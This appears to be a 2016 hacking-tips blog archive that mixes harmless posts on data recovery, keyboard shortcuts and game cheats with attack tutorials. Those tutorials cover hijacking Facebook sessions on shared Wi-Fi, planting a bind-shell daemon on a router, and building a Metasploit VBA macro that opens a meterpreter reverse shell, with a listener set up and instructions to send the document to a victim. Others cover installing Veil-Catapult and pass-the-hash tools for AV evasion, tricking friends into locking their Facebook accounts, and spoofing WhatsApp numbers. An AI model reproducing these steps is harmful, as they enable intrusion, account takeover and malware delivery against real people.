Wednesday 20 July 2016

How Data Recovery Softwares Work


We’ve all dealt with data loss, whether it was from a hard drive failure, data corruption or accidentally deleting a file. If you’ve ever experienced a major loss of data, you’ve probably wondered about data recovery — how does it work?  How effective is it?  How much does it cost? We set out to find out.

Data Loss and Data Recovery
Data loss can take many forms — accidental deletion, hard drive failure, software bugs, data corruption, hacking, even a simple power failure can cause you to lose data. And, of course, there are more extreme cases, like when a hard drive is recovered from a plane crash; amazingly, some data recovery specialists can retrieve data from storage media that’s been almost completely destroyed.

If a piece of data used to be on your hard drive, solid-state drive, USB stick, RAID, or other storage media, you might be able to hire someone (or purchase some software) to perform data recovery. Data recovery is, simply, the salvaging and repair of data that has been lost.

Of course, data recovery won’t always be possible; sometimes a system can be too corrupted or damaged to get much of the data back. However, data-recovery technology has become extremely advanced; for example, Kroll Ontrack, an Australian data recovery company, was able to recover 99% of the data from a hard drive that was on the Challenger space craft when it disintegrated upon re-entry.

How Does Data Recovery Work?
The methods used to recover lost data depend on how the data was lost in the first place; let’s take a look at some of the most common forms here.

File Deletion
Interestingly, any file that’s deleted actually stays on your drive until it’s overwritten with another file. This means that if you act fast, you actually have a pretty good chance of getting the file back. In the case of file deletion, you can use file recovery software like TestDisk, which uses complex algorithms that look at pieces of information that’s left on the hard drive in order to guess where the file was physically stored. If it guesses correctly, you’ll get the file back. If not, you’re out of luck.

However, doing just about anything on your computer can result in the file being overwritten and likely lost forever. Even browsing the Internet can result in cookies or cache files being stored in that location, overwriting the information you’re hoping to retrieve. And installing file recovery software can do the same thing. If the file hasn’t been overwritten, the chances of getting it back vary depending on the format of your file system.

For example, the Windows NTFS system retains file description information after the file has been deleted, making it relatively easy for file recovery software to find the file. Other systems, however, like UTF and FAT, destroy more information about the file when it’s deleted, making it more difficult for file-recovery algorithms to guess the location of the file on the disk.

File Corruption
If you’ve ever gotten one of the dreaded “corrupt hard drive” errors, you know how disheartening it can be. However, it’s still possible that data could be recovered. If you attach the hard drive to another computer, you might find that only the operating system has been corrupted, and that the rest of your data is fine—in this case, it’s just a matter of copying everything to another hard drive.

Another problem that could get you to this point is a corrupted partition table, which might be possible to repair using the correct software. If you can successfully repair the table, it should be easy to get all of your files back. If not, you still might be able to recover enough information from the table to get your files back, though it depends greatly on the level of corruption.

Even if the files you’re trying to recover have been corrupted, there’s a chance that you’ll be able to get usable portions of them back by using recovery software; as long as the software can find the file, it will try to recover it. While you might not be able to use what you get, there’s always a chance that you’ll get a portion of the file back, which could potentially save you a lot of time in trying to recreate it.

File System Format or Damage
Similar to deleting a file, formatting a file system destroys information about the previous files and structure of the disk, but the amount of data that’s erased depends on the system format.

For example, formatting with FAT results in the destruction of a large amount of data and rewriting that section of the disk with zeroes, significantly reducing the likelihood that you’ll be able to recover your data. Some file systems, like NTFS, will have a higher likelihood of recovery if they’re overwritten with the same file system, while others actually have a smaller chance if they’re overwritten with the same system — writing XFS over FAT makes it more likely for the FAT files to be recovered.

In the case of file system damage, the number of files that can be recovered depends on the extent of the damage and what allocation information is still available to the recovery software. If enough information is present for the recovery software to repair the file system and accurately locate previous files, you should be able to recover quite a bit.

Physical Drive Damage
Recovering files that have been deleted or formatted is one thing — getting files off of a drive that’s been damaged is another. While it doesn’t take impressive technical skills to install and run recovery software, dealing with a heavily damaged drive is best left to the professionals, as it usually requires that the drive be taken apart.

Taking a drive apart without damaging it is very difficult — the professionals only open them up in clean rooms, which are highly controlled environments that are free of almost all environmental pollutants. Even a single speck of dust that lands on a hard drive plate can cause the read/write head to crash and multiply the drive’s problems. Static electricity can also damage the drive, so these rooms, these equipment used in them, and the clothing that technicians wear are all specially designed to minimize static.

When a hard drive fails because of physical damage, it can be related to a number of factors, such as a broken controller board or a crashed head. Occasionally these issues can be fixed by replacing the broken part, but in general, if there’s physical damage to the hard drive, you’re going to need some serious work done by the professionals.

If you get your drive to a data recovery specialist, they’ll take a number of steps, from rebuilding parts of the hard drive to creating a disk image and doing their best to repair the corrupted parts using sophisticated software. The cost of the rebuilding, proprietary imaging technologies, and maintenance of the clean rooms is what can drive the cost of professional data recovery upwards of several thousand dollars (though some providers are now able to offer more affordable rates).

Solid State Drive Data Recovery
Solid state drives are becoming more and more popular, especially with the rise of the ultrabook. Obviously, because they haven’t been around as long, recovering data from an SSD is more difficult than it is to recover from a traditional hard drive. However, a number of the same techniques can be used to recover data that’s been deleted or formatted.

However, recovering data from a physically damaged solid state drive can be very expensive, as the technology is still new. When my SSD crashed, the estimate for data recovery on it was about $3,500. A recent white paper estimated that this was average for SSD recovery if the recovery specialist had not received tools and specifications from the manufacturer; that cost was reduced to about $700 if the manufacturer provided support. Hopefully we’ll be seeing this cost come down in the near future.

Your Best Bet: Don’t Lose Your Data
Data recovery software and specialists can do a great job of getting your data back, but it’s risky, time-consuming, and expensive. The best measure you can take to prevent long-term data loss is the one we’ve been advocating for a long time: make lots of backups! Use a cloud backup provider, keep a backup hard drive in your home, and make sure you don’t get caught out by a power surge or an accidental formatting. And take steps to prevent file corruption in the first place.
Read more

Sunday 17 July 2016

Hack Facebook On Same Wifi Network With Android


Hello Friends i think that everyone is waiting for that type of tool to hack Facebook account using their android on same WiFi network. and yes it is now possible to hack facebook account if you and your victim are on same wifi network. the process is very easy and you don't need to do anything just wait and watch. so lets start the trick. but wait before we start i am telling you that it is for educational purpose only if anything done wrong with you -- me and my team and my website is not responsible so please do it on your own risk.
So for this method we need a software called faceniff it is like firesheep. Firesheep is an extension for the Firefox web browser that uses a packet sniffer to intercept unencrypted cookies from websites such as Facebook and Twitter. As cookies are transmitted over networks, packet sniffing is used to discover identities on a sidebar displayed in the browser, and allows the user to instantly take on the log-in credentials of the user by double-clicking on the victim's name.
so this software also do the same thing as firesheep. now i hope you understand about this software so lets start hacking.

Lets Start Just Follow These Simple Steps.

  1. First Of All Download This Software.
  2. Now Install It In Your Mobile.
  3. Open The App and Click On Start.
  4. When The Light Turn Green The Process will Be Started.
  5. Now Just Wait And Watch You Will See Accounts Of Facebook On The App.
Hope You understand the trick. the software which is provide in this link is pro version of that app because there is nothing in free version app. you can only hack 3 facebook account in free version. but if you have pro version you can hack unlimited facebook account and you can also hack other social accounts. comment if you have any problem don't forget to share my article and like it.
Read more

10 Awesome PC Tips That Help You Alot


Hello Guys As you know that everyone owns a computer or laptop. but most of you doesn't know about shortcuts in it because that are hidden or we can say that these codes are secret because most of you don't use it. but if you use it i am sure that'll definitely you can save much of your time. so here are the list i hope you can use it and save your precious time.


1. Press Window key and U twice in quick succession to shutdown the computer.
2. Press Alt+F4 as many times as your running applications to close them down after they get closed press Alt+F4 one more time which will open up power off window and pressing enter that'll power off your computer.
3. Press Ctrl+Z for undo and Ctrl+Y for redo, this may come handy while editing pictures or data.
4. Press Ctrl+F to quickly open search bar to find any data or folder.
5. Just type the name of the site you want to visit on the search bar of your browser and press Ctrl+Enter , this will automatically add www. prefix and .com suffix.
6. Annoyed of your username popping up in facebook log in page then try pressing Shift+Delete to permanently delete it. This Shift+Delete also works for deleting the files permanently from computer (they doen't stay on re-cycle bin).
7. Just press Alt+Print Screen to take the screen shot of only the current window.
8. Point the cursor onto the link and press Ctrl+left click to open the link in new window.
9. Press Ctrl+Shift+N to open a new incognito window, which doesn't save the search history and cookies.
10. Press Ctrl+N to do any thing new for example while your are browsing the net press Ctrl+N to open new browser window.

These are the Top 10 amazing and useful computer short cuts that'll help you..Hope you like the article, Please don't forget to like and share the article. and comment if you have any problem.

Read more

Monday 11 July 2016

Install Software In Router To Hack Everyone


How to install your own software in a home router. It can be a backdoor but it can also be a special monitoring tool or service. We will made some assumptions to keep this tutorial short and simple.
You have access to the router's control panel. This is the case when you own your router and you are practising your security skills on your own network.
The router is running some Open Firmware. In this tutorial I'm assuming it is running DD-wrt.

Step 1: Enable Ssh Access
You can find out how to do that in the official page . Basically you have to click a couple of radio buttons, or type some commands on the command-line.
ssh access will be required to copy our SW in the router and also to launch it.

Step 2: Get Information About the Architecture
As you are using your own router you already know that, but just in case these are some tips.
Log in the router using ssh (you had just enable it)
In the command-line type uname -m. This command will tell you the type of processor installed in your router. It will probably be a MIPS SoC
Also type cat /proc/cpuinfo to get further details.

Step 3: Get the Appropriated Toolchain
Now you need to get (or build) a toolchain for your router platform. In my case I just got one of the official DD-WRT toolchains for MIPS. I'd got the information from one of the messages in the dd-wrt forums.
Download the toolchain and install it.

Step 4: Installing the Toolchain
In general, you just need to do two things to install a toolchain.
Uncompress the toolchain package somewhere in your disk
Add to the PATH the directory with all the toolchain binaries.
The whole sequence is shown in the screen-shot below.

The tools will all be prefixed by mips-.
For the specific toolchain I am using it is actually mips-linux-. That's important if you have to cross-compile autotools packages... but we are not going to talk about this here.

Step 5: Compiling
To keep this tutorial simple, I'm going to use, once again, Netkitty. This tool is pretty convenient because it does not rely on any external library and therefore, we can just compile it. I'm not covering in this tutorial how to compile other tools that requires libraries. You can found a lot of information on the Internet about cross-compiling and staging packages, in case you need to do that.
To compile NetKitty we just need to do:

You will need to edit the source code to make three changes
In line 362 change bash to sh.
In line 424 just before the while add a line saying daemon(0,1); (man daemon for details).
In line 517 delete "use_sin =" at the beginning of the line.
Those changes converts NetKitty into a daemon so we won't need to usescreen or nohup to keep it running when our ssh session is closed.

Step 6: Copy and Run
Now you just need to move the file into the router. We will copy our nk-mipsto the /tmp/ directory. This folder always have write permissions and usually also execution permissions. As we've enabled ssh, we can copy the file usingscp and execute it remotely using ssh.
scp nk-mips root@router-ip:/tmp
ssh root@router-ip "/tmp/nk-mips -shell -s T,5001

Step 7: Disable SSH Access
Now that your remote shell is running you can disable SSH access in the control panel and log into the router just Netcatting to port 5001
nc router-ip 5001

CONCLUSION:
This was a pretty simple example to demonstrate how to run your own SW on your home router. From here you can explore how to deploy more complex tools that depends on external libraries, how to get your applications installed in the router so they can be re-launched after a reboot... Lots of fun!
Read more

How To Rename Your Recycle Bin


In computer the recycle bin  is temporary storage for files that have been deleted in a file manager by the user, but not yet permanently erased from the file system. Typically, a recycle bin is presented as a special file directory to the user (whether or not it is actually a single directory depends on the implementation), allowing the user to browse deleted files, undelete those that were deleted by mistake, or delete them permanently (either one by one, or by the "Empty Recycle Bin" function).
Microsoft's Recycle Bin is implemented as a special folder with columns like Date deleted and Original location. Typically only files deleted via Windows Explorer (but not necessarily other Windows graphical interfaces such as file selection dialogs) will be put into the Recycle Bin; files deleted via the Command Prompt are permanently deleted, as (by default) are files deleted via operating system APIs and applications other than Windows Explorer. Some operating system APIs do, however, allow applications to recycle files rather than delete them. In previous Windows operating systems and in MS-DOS, undeletion was the only way to recover accidentally or intentionally deleted files.

The Recycle Bin only stores files deleted from hard drives, not from removable media, such as memory cards, thumb drives, or floppy disks. Nor does it store files deleted from network drives.

The Recycle Bin has a setting to configure the amount of deleted files it can store. Free disk space allocated for this is not actually used until files are deleted from folders and stored in the Recycle Bin. In versions of Windows prior to Windows Vista, the default configuration of the Recycle Bin is a global setting for all drives to hold 10% of the total capacity of each host hard drive volume to store deleted files. For example, on a volume with a capacity of 20 gigabytes, the Recycle Bin will hold up to 2 gigabytes of deleted files. This can be changed anywhere from 0 to 100% of the drive space, but will not be allowed to exceed 3.99GB of space, even if the user-indicated % of the drive space is larger than 3.99GB. If the Recycle Bin fills up to maximum capacity, the oldest files will be deleted in order to accommodate the newly deleted files. If a file is too large for the Recycle Bin, the user will be prompted to immediately and permanently delete the file instead. This 3.99GB limit does not apply in Windows Vista and later Windows versions.[citation needed]

The actual location of the Recycle Bin depends on the type of operating system and file system. On older FAT file systems (typically Windows 98 and prior), it is located in Drive:\RECYCLED. In the NTFS filesystem (Windows 2000, XP, NT) it is Drive:\RECYCLER. On Windows Vista and Windows 7 it is Drive:\$Recycle.Bin folder.

The Recycle Bin can be accessed from the desktop or Windows Explorer.
In Windows Explorer, files are moved to the Recycle Bin in a number of ways:

  • By right-clicking on a file and selecting delete from the menu
  • Selecting the file and pressing the delete key
  • Selecting delete from the Task pane in Windows XP
  • Selecting the file and choosing delete from the File menu (in Windows XP Explorer)
  • By dragging and dropping a file into the Recycle Bin icon
  • From the Send To menu
  • From a context menu command or some other function in a software application (usually configurable)

It is possible to bypass the Recycle Bin and directly delete a file by holding the SHIFT key while performing an action that would normally send a file to the trash

  1. Click Start / Run
  2. Type regedit and press enter
  3. Open the HKEY_CLASSES_ROOT folder
  4. Open the CLSID folder
  5. Open the {645FF040-5081-101B-9F08-00AA002F954E} folder
  6. Open the ShellFolder folder
  7. Change the "Attributes" data value from "40 01 00 20" to "50 01 00 20". Once


completed change the "CallForAttributes" dword value to "0x00000000" (doubleclick
and change value data to 0). You must change both of these values to get the
rename to appear.
After performing the above steps you will be able to rename the icon like any other
icon. Right-click the Recycle Bin icon on the desktop and click Rename and rename it
to whatever you wish.

Hope You Like My Article And Found It Useful Keep Like And Comment If you have any problem

Read more

Sunday 10 July 2016

Lock Your Friends Facebook Account Temporarly


Facebook Is the largest and world's no.1 social media. Facebook is the fun place for everyone. people make friends around world in Facebook. so my today's trick is about Facebook. this trick will temporarly lock your friends account if you do this correctly. this trick is simple and risk free you can try this trick at anywhere and prank with your friends. so lets start with trick.

Step 1: Just send this message to your Victim (your Facebook friend) whom you want to get lock their Facebook account.
 http:// 34255353309
Step 2: And ask them to do 3 favor for you. First ask them to copy that link. Then ask them to remove the Space left after http://. Then finally ask them to paste that link in their status or in the form of comments in Facebook through their account.

The Link should be like this (http://34255353309) Space is removed from my side. If you try this in your Facebook account with space then your account will be locked temp. So be caution before using this trick on your Facebook account.

Step 3: That’s it! Once they do this, their account will be locked as soon as they did ?? Quite funny and interesting? Yes! it will be? Have some fun.
If your Facebook account is temporary Blocked then don’t worry about it. It can resolved again by following a simple trick which added below. If your Facebook ID/Profile/Account is temporary blocked then follow this method,

Step 1: When you see “Your Account is Temporary Locked”, just Click the Continue.

Step 2: Then complete a security challenge by entering the captcha.

Step 3: Now confirm your ID by Answering your security question, Mobile/Phone Number verification or by Identifying your friends on Facebook. That’s it! Have some fun and make your friend prank with this trick.

Conclusion:
Hope this post ends with another awesome trick and informative things about Locking and Unlocking Facebook ID/Profile/Account in 3 steps. If you’re facing any issues then share it with us in comments below. We try our best to fix them all asap. If your feel that this post helped you a lot then make a share of this post with your friends via social media networking sites. Don’t forget to share your thoughts in comments below!
Read more

Wednesday 6 July 2016

Chicken Invaders 2 With Cheats


Chicken Invaders is a series of shoot 'em up video games, developed by InterAction studios and released for Microsoft Windows, OS X, Linux, iOS, Windows Phone, and Android platforms. There are five games in the series.

The main theme of the game is a battle between a lone combat spacecraft and a technologically advanced race of space-faring chickens, who are intent on subjugating (and later destroying) Earth. The games make heavy use of humor, especially in the form of parodies of Galaxian, Star Wars, Space Invaders and Star Trek.

Chicken Invaders: The Next Wave
Chicken Invaders: The Next Wave (or Chicken Invaders 2) is the second game in the series. It can be played by one or two players. The player takes command of the same lone spacecraft of the previous and must eliminate the chicken infestation of the solar system. The game features eleven levels, each of which consists of 10 waves of attacking hostiles. In all the waves, chickens attack by dropping eggs which have to be dodged. The player can collect different items that help him/her in the game. Primary weapons may be changed by collecting parcels. Power-ups may also be collected to upgrade the primary weapon. Weapons may be upgraded up to eleven levels. The eleventh level however, is only acquired by collecting ten power-ups. Player may collect and accumulate drumsticks to get missiles, powerful weapons that can wipe out an entire wave. In all levels, except in the asteroid belt level, the ninth wave has a bonus (usually a new weapon, or extra firepower) awarded for not using missiles throughout the level, while the last wave features a boss. The game also comes in a Christmas Edition.

The Game is easy to play and have great graphics. there are some cheats for this game that can make your game easy. there are more then three types of fire. and you can make your fire double by just destroying asteroid and air-craft and get the bonus from them. you can also get extra life from those asteroid and air crafts. but you can get all those bonus through cheats. so here are some cheats.

Cheat mode:
To use the following cheats, you must enable them under 'Options'.



Level skip   [F5]
Extra lives   [F6]
Extra weapons   [F7]
Extra rockets     [F8]
   

Cheat Sources =  http://www.gamerevolution.com/cheats/chicken-invaders-2#o5EijHiMOVU6j7sX.99

Read more

Tuesday 5 July 2016

Use Whatsapp With Fake US Number


WhatsApp has become the best and most used application for all mobile users. Not only it is available for every mobile system or operating system like android, iphone, blackberry mobile phones, symbian, htc etc. but also it is the most used app in these systems too. If you having an internet in your mobile phone then with the help of this application you can send unlimited messages to any one in the world. Message type can be text, audio, video, images etc. If you are one who daily updates their whatsapp status then check out this awesome cool whatsapp status. As we all know that the popularity of WhatsApp has grown tremendously that many whatsapp tricks and tips coming in the internet.

Many times, we need to use WhatsApp for sending or receiving messages/media without showing or using our real mobile number or even trick our friends and message without revealing our Identity. Now, by using the following tutorial you will be able to create a fake WhatsApp account with a spoofed U.S.A number in any country, that too will all the normal functioning of WhatsApp . The tutorial will work for Android, and iOS devices (iPhone) too!

Follow These Steps To Use Whatsapp Without Number Or With Spoof Number:


  1.  Install Whatsapp With Latest Version (Skip This Step If You Already Install Whatsapp).
  2.  Now Download This App From Playstore.
  3.  Create Account In This App And Verify It With Your Current Mobile Number.
  4.  Now Open The App You'll See US Number In The Option List. Remeber This Number And  Open Whatsapp
  5.  Now Paste The Number Which Is In The App And Click On Verify. Wait For Second You'll  Receive Message In The App.
  • Note: If you didn't receive the message then click on call me and receive the code through call.
Conclusion:
This Trick is 1000% workable checked by me. this trick will also helpful for other online verification sites. hope you like my article comment if you have any problem. and share if you found this article helpful.
Read more

Get Shell Using ShelCode In Macro

GET SHELL USING SHELLCODE IN MACRO


We can execute shellcode directly in macro. It`s very old method, but still it`s useful ; because AV don`t trigger it.First we will generate VB code of our payload.

msfconsole
use payload/windows/meterpreter/reverse_tcp
set LHOST 192.168.56.102
set LPORT 443
generate -t vba
exploit

Now we have generated our shellcode. Now we will create macro.


  1. Open any word or Excell document
  2. Click on view & then click on Macros.
  3. Give name to macro & create macro.
  4. Remove all things from modules windows & Paste our generated VB code.
  5. Saved it as type Word Macro-Enabled Document.


Send this file to victim. By default in MS Office  " Disable all macros with notification " option is enabled , so whenever any document try to execute Macro it will pop up security warning that macro is disable ; so to execute our shellcode using macro victim should click on Enable content.

You have to setup listener to listen reverse connection. If your IP is not available when victim open Document then document will be crash.So now we will setup listener

use exploit/multi/handler
set lhost 192.168.56.102
set lport 443
set payload windows/meterpreter/reverse_tcp
set autorunscript migrate -n explorer.exe
exploit

Here we setup migrate script as autorunscript so when document will closed our shell will not die.
Read more

Install And Use Veil-Catapult In Bactrack

HOW TO INSTALL AND USE VEIL-CATAPULT IN BACKTRACK?

Today we are gonna talk about Veil-Catapult.Veil-Catapult is payload delivery for when metasploit’s psexec getting caught by AV.It utilizes Veil-Evasion to generate AV-evading binaries, impacket to upload/host the binaries, and the passing-the-hash toolkit to trigger execution.It officially supported on kali linux only.I`m going to show you how to install Veil-Catapult in backtrack?

First if you have not already installed veil-evasion framework then first install it as mentioned here.After installing Veil-evasion follow steps.

root@bt:~wget https://github.com/Veil-Framework/Veil-Catapult/archive/master.zip

root@bt:~unzip master.zip

root@bt:~cd Veil-Catapult-master/

root@bt:~sh setup.sh

Now veil-catapult require impacket library & passing the hash toolkit.So setup script try to install PTH suite but we got error.So we have to manually do it.

Install Passing The Hash.

root@bt:~wget https://passing-the-hash.googlecode.com/files/wmiPTH-1.0-1.deb

root@bt:~wget https://passing-the-hash.googlecode.com/files/winexePTH1.1.0-1.deb

root@bt:~dpkg -i winexePTH1.1.0-1.deb

root@bt:~dpkg -i wmiPTH-1.0-1.deb

If you are using other OS then you have to manually build it as mentioned here .

It installed into the /opt/pth/bin folder , we have to move it into /usr/bin.

root@bt:~# ln -s /opt/pth/bin/wmis /usr/bin/pth-wmis

root@bt:~# ln -s /opt/pth/bin/winexe /usr/bin/pth-winexe

root@bt:~# ln -s /opt/pth/bin/wmic /usr/bin/pth-wmic

Conclusion:
This Method Will Install Veil-Catapult In Backtrack. Hope You Enjoy My Articles And Found Them Help Full For You. Comment If You Have Any Problem. Share Our Articles If You Like Them.
Read more